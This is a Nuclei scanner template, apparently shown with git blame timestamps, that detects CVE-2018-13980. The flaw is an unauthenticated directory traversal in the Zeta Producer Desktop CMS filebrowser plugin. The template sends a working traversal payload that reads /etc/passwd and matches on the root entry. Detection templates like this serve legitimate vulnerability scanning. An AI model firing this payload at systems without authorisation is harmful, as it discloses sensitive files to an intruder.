2021-10-18 13:00:57 +00:00
id : CVE-2018-13980
info :
name : Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
author : wisnupramoedya
2021-10-18 15:16:57 +00:00
severity : medium
2021-10-18 13:00:57 +00:00
description : The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
reference :
- https://www.exploit-db.com/exploits/45016
- https://nvd.nist.gov/vuln/detail/CVE-2018-13980
2021-10-18 15:16:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.5
2021-10-18 15:16:57 +00:00
cve-id : CVE-2018-13980
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,lfi
2021-10-18 13:00:57 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-10-18 13:00:57 +00:00
- type : status
status :
- 200